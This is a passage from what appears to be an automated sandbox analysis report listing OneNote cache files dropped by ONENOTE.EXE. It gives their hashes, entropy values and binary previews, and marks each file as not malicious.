Preview:	2...>....................................................................................................................................................................................................V......VV..@...?..G..........................VV..@...?..G..V...................................................V......V..................................................V......V\..............................................................4..1...(...(.......1.0.3.3.................p.......%l..P.=B.......Y...........`....yN.F....X[....N...^............................................................................................................`....yN.F....X[....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5116591298102606
Encrypted:	false
SSDEEP:	12:dyhkOdE/M0MVe3Ze1fXb0M1eRG/LrM/jGd5z/kSIoRm/Wc3++QEQlGfrH6QEyLHi:L/MxEUx0u//M/Wz/hIo8/HOzEQsOe
MD5:	1F38DBD40D269D31FA3D2D7A0896182C
SHA1:	0ED3FDFEFFD154DC0D8D0CAC3793F9F1B35F85B5
SHA-256:	94633B6AA89CD45ACB51871448D76EEF6CC4B7AE7D6FC5DABA2BFBABABA4AC27
SHA-512:	FF2B0FF3AF76A8D9F55C26C2D319EA12505B31F1BF45B9B3A92162F2E53DBDC778B6F39882817CEEDC6FE2BC7371832EC9F53B25ED52C0CA4A37788FD0E4D006
Malicious:	false
Preview:	..................................?......................................................................................................................................................................."......."$...I.i....%..oz......ozt/.gO.:.....7eE..1.@.d];iU$.7eE.......0C..=u.?......:R...q.E..Yv6o..:R............."......."..................................................."..B...."\......"N......"N.)...."N.7...."N.>............................4..1...(...(.......U.s.e.r.....................oz..c..,.....................".. ..$..........7eE.....7eE..1.@.d];iU$..oz......ozt/.gO.:.....2.................................".7eE..oz..............................7eE..c..,....................."...".. ..$.......oz......ozt/.gO.:....:R......:R...q.E..Yv6o...."$...I.i....%..."..ozt/.gO.:.....oz.........................>...............:R...q.E..Yv6o...........................................:R...c..,....................."..."...".. ..$........................0C..=u.?..:R......:R...q.E..Yv6o..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7626421186156778
Encrypted:	false
SSDEEP:	6:bEIaconltl03glltO6gdLx8CAXCVWk/2k1If7Rlt1FN/lww1ETo:bEIacolXxM3dYXC71o7DLLtwQETo
MD5:	0190FFF8913F39894A8C8077BBA07781
SHA1:	EA81D955855F61AB9DBBF0B981A1C9B415E7155F
SHA-256:	075A78230AE113791430C2CBEB61F85771B5183A320F9E3811C6C7C172F2F7D2
SHA-512:	F779554C39A01119650522146C200220D77D32FBA9995ED60A6166B6C635096269C09F60A152AE56566A484847B80597A197C44483D2CBDB82E6172DBD9E160C
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................#'......#'....J.....N\|..=S......=S..g_A........=S..g_A........=S..#'....J.....N\|..#'...............................#'......#'..................................................#'..#...#'\.....#'N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.......................=S..c..,....................#'.. ..$................#'.. ..$p.............h.J..J..bx..P........p...A.E....I.u....N...^............................................................................................................p...A.E....I.u............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5235168180614654
Encrypted:	false
SSDEEP:	6:jhzcPyIL7yVrlT7KyLx8Olu3mZp67XTpCVh6Zmw1EVpCVh6X0:jRcxiVhKV3mZpGTpOIZmQEVpOIk
MD5:	6FE311A0F659366FE8362C1C35916302
SHA1:	617318E0E452E53DCF8E8C32F8B65C670B277B5E
SHA-256:	8418127AD476CAEFF4654EEC04013E37CC02CF7A69E2EAB2D5ABFE936F010DE8
SHA-512:	E49EE43B7CE5F955C4DAC15DF42838D4D147C548CDB3E767E619A7B63996DDABCC8A4976C725CCF7CCB79E7919BE4B5D677999E497AF8D34666E8F0C8B0D22A6
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................D.......D..B..D.................................D..B..D.........D....................................................D.......D...................................................D.......D.\..............................................................4..1...(...(.......1.0.3.3.................p.......!.;1b..O...R..............{.erQL..`..`).....N...^............................................................................................................{.erQL..`..`).....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7629723521553758
Encrypted:	false
SSDEEP:	6:D0CANu+y71vRI9mpM9m6+y7Fi1EU9l/SZInLx8felBkls0CluJD/2ke1xDRlsllb:D0COuHuxpfijjseIW0K1tsl0EwQEiEM
MD5:	94E09C11FD60CBCFA7F175DF67B153AD
SHA1:	044355574E30716F656D8438758893E9F3EDFA46
SHA-256:	93674B1B6340F3F229675224E9C74C8129A2B93BD54D42E52C07B6293D81CD64
SHA-512:	9263840D0F7F8C5BB05CD29F72D90610BA6919764C3B37EAB55D55B5676B8E7909EAB3EC297C39337A9DC9EC0C2383456EBE4C68FE7D69038896C02C9B51AC83
Malicious:	false
Preview:	2...>...............................................................................................................................................................................................................h..K.p.G....d.......d...SYH.W...).d...SYH.W...).d......h..K.p.G.....................................................................................................$.....\.......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................d...c..,........................ ..$.................... ..$p...........z.5..k.E...$y./r......p.B....E....v^t.....N...^...........................................................................................................p.B....E....v^t.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.527945276432417
Encrypted:	false
SSDEEP:	6:jhzcHlla65To9w5To9P3llvmthku/yLx8Olu39iGq8Xw1Em8b:jRcH/55H5UltcnV3bTQEz
MD5:	E120D218B4341C0DC7C217902258567E
SHA1:	DB9DBD9578AE00B93724477796EBD4D6C2B5DFDC
SHA-256:	3F219407E9B2DCB44B39AD131DE2A46506A75C2D79C077B0FC01B5C2E604E315
SHA-512:	EF3EC8B8D03F4926FC33E1D11EBE5CE0012A1048E5F9A75CFEF4C01F6099B121543A4F0CF704DD73103BD23E31D08D1F921C1C5445A3EE349AE9C4A5011F5696
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................%.8.....%.8....@.l^..X&.........................%.8....@.l^..X&.%.8..................................................%.8.....%.8.................................................%.8.....%.8\..............................................................4..1...(...(.......1.0.3.3.................p.........R!.>.B.Of'...............]T.).@..F8[s......N...^............................................................................................................]T.).@..F8[s......................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6114155603767084
Encrypted:	false
SSDEEP:	6:90CwgFEFktnk2sX9/Lx88cbrMkq2Sz1semw1Ebf0:eCwJKyPnkNYqfQEbf0
MD5:	1EC49F20314208F313A7D705FF0A14B9
SHA1:	61958B6262DCBD6DFB106C99CA57AEBF7E3B6A24
SHA-256:	47F8AB9B03CB10CE0D308A81F8793FDEFCF4D14BD2334B5A92A003E065B31F25
SHA-512:	1B209200ED813523362102D9EAB462D5689688B5556B4E4DA53E832B505AFFE949EC0D114059A556326E2FB6948293B659E2D2EA42F73B367C9DB990A1E4175A
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................2.......2....iL.=.X.............................2....iL.=.X.....2....................................................2.......2...................................................2..."...2.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.........){rf*I.................B....C...X,.......N...^............................................................................................................B....C...X,.......................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8031788779109649
Encrypted:	false
SSDEEP:	12:EE8rBmrgsmrlhYJtxplvsD4Irj7m1Ldh8o6/QEw6z:2mrgsmrlKnAj7udP6U
MD5:	0DCF3883A0F8FAD266EC7F99F4D02C5F
SHA1:	60D91C99FC68D141418F8A55DB7251B9675C6493
SHA-256:	05A3B177D1DEB217F9FA3F2D31427A34FFBACE41A7CC021093ACF5E8388CD892
SHA-512:	BBABB7D4EF4AA94F56C1148A0BA31D03794D4FFE6F87B8E0C02560AE2D343BEFDB78707416F3D2F349B5087291B9FF002B74EC062842463DA083F4408F7F9A06
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................PCL.....PCLP.QVH.Y...{.n.......n.....5H.;.....-n.....5H.;.....-n...PCLP.QVH.Y...{.PCL..............................PCL.....PCL.................................................PCL..%..PCL\....PCLN."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................n....c..,...................PCL.. ..$...............PCL.. ..$p...........5/.....A..W.7..'...........,CH.\.3%P.d....N...^................................................................................................................,CH.\.3%P.d............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5009875432628572
Encrypted:	false
SSDEEP:	6:jhzcM/TpiLR2iJlyLx8Olu33W8dAsGvsEX3w1E2vsEX7:jRcCli/lV3Ge4siQEIsa
MD5:	A60AFE925A5EF0FFA80008597C5D4AF7
SHA1:	FAE47A3EDAF3158BD17045260E06DED6ABE53FB5
SHA-256:	0930D6C0424F50FF7D00709A4CB1EB83C9C35C10041F4C584CFD913DD93E46EC
SHA-512:	5FDEC6597C4BAA2E194324967DE98368B62624D743661871FD5DE7E9D4D62E7EFE0372BDDDA7D08B0C6CAF397B8FF5C63C9695107A3E07D0CB0B16E0F8CC444F
Malicious:	false
Preview:	2...>..................................................................................................................................................................................................................K.2b....................................K.2b.................................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p........9...IJG....+.;................J.L...t........N...^................................................................................................................J.L...t........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.360432590927465
Encrypted:	false
SSDEEP:	96:S/s+kN/Oc7AaSmNEV0yBXR96kRQymdPNirKwL:2sPOc7AaSDJBXR96kRJmd
MD5:	F31A2EC8CE43183D2E3BBBF6E790305C
SHA1:	455AFBFE22A53D23C8C9CE94EAA70351BF612FC0
SHA-256:	F5D76D2C9432B42157723F9D9F0A430B1E88E42E6B6675876618D6D4088B83E4
SHA-512:	A1713510C04DC0B6C9AC8FCDE1D18526ADE5145BB5F3D0586D5202ED3DF1F87A3868BDDD7BDCBEA4D7CA9F06DD6A51F6AF2175310DE0759720EE1EC948FFF3D0
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~......................................k.QG./}"..gRJ.I.......I.qk..B.....LZ...k.QG./}"..gRJ.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............ps7...5./.........N...^...............(..W...L...C.S.........f........................................I.qk..B.....LZ..............ps7...5./...............ps7...5./.............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3433522191243314
Encrypted:	false
SSDEEP:	48:ZjNqBsFQiP3oYntLnmEKd79BXR9WVQoAkrdQqr9mNBX6jmq2lGqjJEg:NNqBsfYsoEKd5BXR95HkRQy0NuEJE
MD5:	EF82739C19B48199C2A8196720B10764
SHA1:	5DF313C44D5CC257E6C50D6C344844E315D5420A
SHA-256:	FC6EB9E629476876532E38F7D43F363CFE9769ACAE82D1C835BAA56D134B3AB5
SHA-512:	667CFD77DBB043ABCD9DDA7557548CAE6FBFFB1855DDF2CDD4730C802759CF07A50D19736A8F9F98E3CACCF3EEE04601AE9D422E9FC904FC4DB93CE237C58C8B
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZK0......K0.r.p].&v.t\|..+K0.r.p].&v.t\|..+K0...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._a.6.o...j.xoI.R....N...^................S.\|.9O.ls..N.H........f........................................I.qk..B.....LZ............_a.6.o...j.xoI.R........_a.6.o...j.xoI.R.........K0......K0......K0..........................................K0.j....K0.T.]..K0......K0..B..K0.H....K0...B..K0...>.)K0...J...................;........4...4...4.."..............K0..K0..K0...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........K0......K0.....#K0.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.329371239315509
Encrypted:	false
SSDEEP:	96:nAfsbqBVfXwDSbdEDXTA9iQRQyEAUDU7M:nAfsOBVfJb6DX09iQRJbC
MD5:	682FF44213C6143299D9198EBAC6BD2A
SHA1:	3AC9F4F80214D59BAF6D10750DFC5C2DBE5168E9
SHA-256:	0B36E5FB7F5958DC1394331F3F25E3080BC5C5331606D56C6E9CA57A9A80E364
SHA-512:	ECA838C991EF416E69C1D4F7FABDCA46DEF23DC362287AFC9D8FD92D62437FCE578CFCAE8413DD70DA2F39CE0654406C74FE1F4CF0010756E58C928099A56C45
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ[@......[@...T......4...[@...T......4...[@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................8.2jtu.#.<....N...^..................j\|..O................f........................................I.qk..B.....LZ.................8.2jtu.#.<.............8.2jtu.#.<.........[@......[@......[@..........................................[@.j....[@.T.]..[@......[@..B..[@.H....[@...B..[@...>.)[@...J...................;........4...4...4.."..............[@..[@..[@...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........[@......[@.....#[@.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.364944795301563
Encrypted:	false
SSDEEP:	96:EsQYgD68xLEXNrxPpXiD9zcRQyyTPjxooq0LI:EsQYgD6RXNNpX49zcRJyTPjxooq6I
MD5:	B35713F50E872A0390AEBE9DF76CA73F
SHA1:	04B85DDC120B5E13B94C134F1A91823FFB9761B6
SHA-256:	40492AB10C331957155A27761F0FCA65FA9C6960F0FCDB45651B6AA660B066B2
SHA-512:	BEA82A3EECA35AC99DF4BA99C578DEB7999BDD125F2669431DFE02572079D35CE3CB8437740F9E8852AEE1D51AFC2C7F327E8F70C0080D45C488215CC917AFA4
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.............t..0^:...w.....t..0^:...w.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............z?.f...KH..u~....N...^................o.g...O...V]k.........f........................................I.qk..B.....LZ..............z?.f...KH..u~..........z?.f...KH..u~........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.365705631585288
Encrypted:	false
SSDEEP:	96:2sCWDnhEmdrIX4I9+wRQyGTBUQXcMzQ31J:2sRD+m6Xp9+wRJGT+QXcMzQFJ
MD5:	DB3F61AABB7C11BD79CCAF01CEB13B74
SHA1:	9641AD25C2CE3C76D4A3A9FAE3F321733B5C35C7
SHA-256:	6781A70546C0D2F6820F29F7FCD71723F4EDB1BF4F6DD951E90F3F6D678B6948
SHA-512:	981A3FF50D514BD64A9639C5111C4B9CF887E53642A57201BFB0A30FBF0065FD532E9EE5CF623E2425107B02B52DAFF69EE000CA745ED48C1552BF6CECD2FEE1
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ..q.......q..;../?.....J..q..;../?.....J..q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............rf...5.ne.......N...^...............G-...M.K...............f........................................I.qk..B.....LZ..............rf...5.ne.............rf...5.ne..............q.......q.......q...........................................qj......qT.]....q.......q..B....qH......q..B....q..>.)..q..J...................;........4...4...4.."................q...q...q..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........q.......q....#..q............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.516141761953505
Encrypted:	false
SSDEEP:	48:esgPi3uOmFb61YKQtUEepX29M18oofsrdQVruWBBXWgGkXxt7F:esB+O6b6i3WEuX29MylfsRQ53Eqj7
MD5:	CAED24FDE5D98EE77BBCE98B51489E44
SHA1:	0C772969BCA6C3E2DEA5C8D369503C1BD7033D24
SHA-256:	DB774D9A13D6CFE2D781DF7388EB8DA665EDB37E9EC210D89B22ACB4D82901A7
SHA-512:	725DC39ABEADDCCB156077956CB1D9531BB79A7661E516104F9961C3F4CBC4D78D7C0BC208A3D9538ECF167683698DC8383EDCD43B1E06C82AF9CA5235EB86FE
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZC.......C..(.'..0."..5].C..(.'..0."..5].C....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............H.......,.......N...^..................z...E.pc..%].........Z........................................I.qk..B.....LZ..............H.......,.............H.......,............C.......C.......C...........................................C..j....C..T$c..C.......C..G..C....H..C....>..C.......C.. .3...................;........4...4...4.."..............C...C...C....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........C.......C......#C..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
